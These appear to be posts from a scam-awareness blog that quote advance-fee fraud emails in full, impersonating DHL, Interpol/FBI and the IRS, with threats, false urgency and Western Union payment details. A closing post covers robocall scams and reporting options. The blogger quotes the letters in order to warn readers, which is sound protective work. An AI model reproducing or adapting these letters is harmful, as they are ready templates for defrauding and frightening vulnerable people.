Text question= = = =Who is father
Text answers= = = = God
Amount= = = = = = $50.00usd
MTCN Number= = = =?

You must send us the details provided by Western Union or money gram immediately you made the payment of $50 usd for us to receive it and commence for your delivery immediately.

Senders Name= = = =
Sender Address= = =
Sender Country= = =
Sender City= = = = =
MTCN= = = = = = =
Amount sent= = = =

Beside if you fail to comply with the needed $50 Dollars required there is no way we can deliver the consignment box to your country,

Looking forward to hear from you if you are still ALIVE, reply back for fast action so that your delivery will commence upon receipt of your payment.

Best Regards,

Dr Mrs.Linda Williams
DIRECTOR DHL COURIER SERVICE.
COMPANY BENIN REPUBLIC.
TEL/ +22999935738
Address 12/1 Midombo Expway Cotonou-Benin

Be careful out there.

The Old Wolf has spoken.

Oh no, I’m going to be arrested! (Scam)

Interpol-Logo

The Lads from Cotonou have now switched from the carrot to the stick. I have not been forthcoming with their payments, so they’re threatening me with arrest by Interpol if I don’t pony up. Only $85.00. Of course, once I shell out, there’s still that chance that I could get my hands on $9,000,000.00 USD… but that’s completely legit.

Sheesh.


Subject: URGENT NOTICE

From: INTERPOL POLICE <interpolgeneralofpoliceforce@gmail.com>

To: undisclosed-recipients:;

INTERPOL SECTION 1
STATION CODE> 7101
POLICE CEL> 7011/FEDERAL BUREAU OF INVESTIGATION (FBI)
EMAIL: interpolgeneralofpoliceforce@gmail.com

URGENT NOTICE.

You have failed to comply with our directives .we have been waiting for your confirmation letter since may 14th 2014 as our director has already been notified about you to get this process completed yesterday and right now the warrant of arrest has been signed against you and it will be carried out in the next 72 hours as strictly signed by the FBI director.

We have investigated and found out that you didn’t have any idea when the fraudulent deal was committed with your information’s/identity and right now your ID is placed on our website as a wanted person and you will be announce in all the local channels that you are wanted by the FBI after 72 hours. As a good Christian and a honest man, i decided to see how i could be of help to you because i would not be happy to see you end up in jail and all your properties confiscated all because of your information’ which was used to carry out a fraudulent transactions, i called the EFCC and they directed me to a private attorney who could help you get this process done by securing a money laundry certificate document at the sum of $85 USD only and which will save you from this arrest and i believed that this process is cheaper for you.

You need to do everything possible within today and tomorrow to get this process done because our director has called to inform me that the warrant of arrest has been signed against you and once it has been approved, then the arrest will be carried out, and from our investigations we learn that you were the person that forwarded your id to one impostor/fraudsters last month when he had a deal with you about the transfer of some illegal funds into your bank account which is valued at the sum of $5,000,000.00 usd.

I pleaded on your behalf so that this agency could give you till 17/02/2015 being today so that you could get this process done because i learn that you were sent several e-mail without getting a response from you, please bear it in mind that this is the only way that i can be able to help you at this moment or you would have to face the law of the United State and its consequences.

You are advised to make the payment through Western Union money transfer with the below details to the attorney.

RECEIVER NAME: SAM NWA
COUNTRY: BENIN REPUBLIC
CITY: COTONOU
TEXT QUESTION: ONE
TEXT ANSWER: TWO
AMOUNT: $85 USD
SENDERS NAME?
MTCN?

Send the payment details to me which are senders name and address, MTCN number, text question and answer used and the amount sent. Make sure that you didn’t hesitate making the payment down to the agency today so that they could have the certificate endorsed, signed and stamped immediately without any further delay.

After all this process has been carried out, then we would have to proceed to the bank for the transfer of your compensation funds which is valued at the sum of $9,000,000.00 USD which was suppose to have been transferred to you all this while.

Note/ all the crimes agencies have been contacted on this regards and we would use your address which is stated above and you’re ID to trace you if you disregard this instructions again for the last time.

Thanks for your co-operation.

Thanks as i wait for your response

Sincerely yours,

Mr. Ronald Kenneth Noble (Interpol Secretary General)
United States


Be careful out there, people.

The Old Wolf has spoken.

More Folly from Benin

Internet-Scam-shutterstock_98617274

Another scam email from Benin, supposedly from the “IRS.” The English is horrible, the format is crude, and the criminals are getting more desperate. They used to ask for thousands of dollars as up-front fees, now they’re down to almost begging for pennies. But don’t be fooled – there are no funds, and anyone who bites is at risk to lose their entire life savings if they are gullible enough.

Subject: U.S Internal Revenue Service Department Internal Revenue Service
 United States Department of the Treasury
From: “Dr.GRAHAM HONNSE” <drgrahamhonnse@gmail.com>

To: undisclosed-recipients:;

U.S Internal Revenue Service Department
Internal Revenue Service United States Department of the Treasury
Accessibility Skip to Top Navigation
2283 3rd Ave New York, NY 10035, United States

Greeting from IRS USA

We the Internal Revenue Service, believed that you received the previous message we sent to you, prior to your dealings with the U.S Custom Authority at (JFK) John F. Kennedy International Airport New York as regards to your over-due contract payment consignment trunk box worth $10,500.000.00 (Ten Million Five Hundred Thousand United States Dollars only), which was endorsed in your favor and like we stated earlier, we have dully screened through this project as stipulated on our protocols of operation and have finally confirmed that your contract payment is 100% genuine and hitch free from all face and of which you have the lawful right to claim your fund without any further delay.

This is to bring to your notice that we have just been informed through secret source that the U.S Custom Authority at (JFK) John F. Kennedy International Airport New York are making arrangement to have your contract fund wired into the Bank account of Mrs. Jane Frederick, the lady that contacted them, earlier and presented some documentations evidencing your claim purported to have been signed personally by you for the release of your contract fund to her, since you have chose to ignore their messages and refuse to pay the required $155.00 for Custom Clearance Certificate C.C.C. charges as imposed, despite the advise we gave to you.

I want to personally assure you once again that you will have every course to smile and be happy upon conclusion of this project, as we will continue monitoring all your services with them at all level as well as your correspondence, until you have received your Metal Trunk Box accordingly, we are here to protect your interest and that is the reason why we are doing all we can to make sure all goes well. This is a huge amount of money which we don’t wish for you to lose.

We understand that the imposed fee might be too much for you to pay so to further make things easier for you, we have discussed with the U.S Custom Authority at (JFK) John F. Kennedy International Airport New York pleaded on your behalf for them to give you the grace of sending half of the charges which will be only $77.50.00 Us Dollar for now after which the Diplomatic Agent deliver your consignment trunk box to you then once you receive your fund, you can then pay the remaining balance of the fee.

All we want you to do right now is to send the half payment of the money with the name listed below so we can forward it to Benin Republic Customs authority to help us obtain the Custom Clearance Certificate C.C.C. and the diplomat will make the delivery to your home address tomorrow morning.

Description of Your Consignment box to be delivered:

Type:……CONSIGNMENT TRUNK BOX
Size:…../ 2:1 CM.
Weight:…5.6KG.
Color:…..BLACK BOX
Registration NO: #98952457
Serial #5267843156
Pin number…*****

Contact us right away and let me know when you will send half of the charges as we discussed with them to enable them route your fund to you with immediate effect. This is a life time opportunity and we will advise you to take advantage of it, before it will become too late for consideration.

Receiver’s Data/information to send the fee through Western Union or Money Gram directly to the officer Incharge in Benin Republic.

Receiver’s Name:::::::::::: Julius Chukuwma

City::::::::::::::::::::::: Cotonou
COUNTRY:::::::::::::::::::: Benin Repulic
Text Question:::::::::::::: GOD
Text Answer:::::::::::::::: BLESS
Amount::::::::::::::::::::: $77.50. 00
Sender’s Name::::::::::::::
Sender’s Address:::::::::::

MTCN#::::::::::::::::::::::

Also be informed that we came to an agreement with the U.S Custom Authority at (JFK) John F. Kennedy International Airport New York that you will be sending half of the fee, latest before the end of tomorrow so please we will advise that you send the fee right away because if you fail to do that, then they will have no other choice than to release your fund to Mrs. Jane Frederick who is ready to work with them, and am sure it will be a very great loss to you as we will not be able to help you then, hence your fund will be lost forever.

This is an official notification and we advise you treat it with utmost urgency, in your best interest.

Happy New Year and God bless you!!!

Yours Sincerely,
IRS Commissioner,
Dr. Graham Johnson Honnse

I post these mostly against the eventuality that someone who really doesn’t know what African scam letters are about might search the web for information about the “opportunity.”

Keep in mind that for these scams to succeed, the hope of riches must suppress any sense of morality the intended victim might have.

  • There is no money waiting for you in Africa.
  • Never send money to a stranger via Western Union or Money Card.
  • Ignore all such emails.

Be careful out there.

The Old Wolf has spoken.

The Incredible Onslaught of Scamming Telemarketers

robo-call

  • “Hi, this is Rachel from Credit Card Services!”
  • “Hello, Seniors! Because you have been referred by a friend, we have a Medical Alert System for you free of charge!”
  • “It is critical that we speak to the business owner today! Our records indicate that you have not claimed your Google+ Listing!”

Some of these scams have been around for a long time; back in 2012, the FTC settled with five defendants for running the “Ann from Credit Card Services” scam, but like the mythical Hydra, for every head you cut off, two more grow in its place. It’s infuriating; my phone has long been on the national DNC register, but that tool seems to have about as many teeth as the CAN-SPAM act, meaning virtually zero. The Medical Alert scam appears to have ramped up during the last month despite being on the FTC’s radar for over two years.

At this point there is very little that the average consumer can do directly to stop the flood. But there are things you can do to reduce your own frustration level, and some which, over time, may help the authorities to take action against these scammers.

  • Report unwanted phone calls to the FCC, especially if you are on the Do Not Call list.
  • Make a note about the number that called you at 800Notes.com so that others can be aware of which numbers are being used by scammers. Most of these spoof their Caller ID anyway, but it’s just one more piece of the puzzle that investigators can use.
  • Call or write your Congressperson. If they get enough people complaining about this, they’re more likely to lend their weight to an effort to eradicate the scum.
  • Add all scam/robocall/hangup numbers to your “reject list.” This will cut down on the number of calls you even are aware of.

In the meantime, remember what the FTC tells consumers:

If you get a call with a recorded sales message and you haven’t given the company your written permission to call, the call is illegal. Since the call itself is illegal, you can bet the offer is a scam

Be careful out there and watch over your vulnerable loved ones.

The Old Wolf has spoken.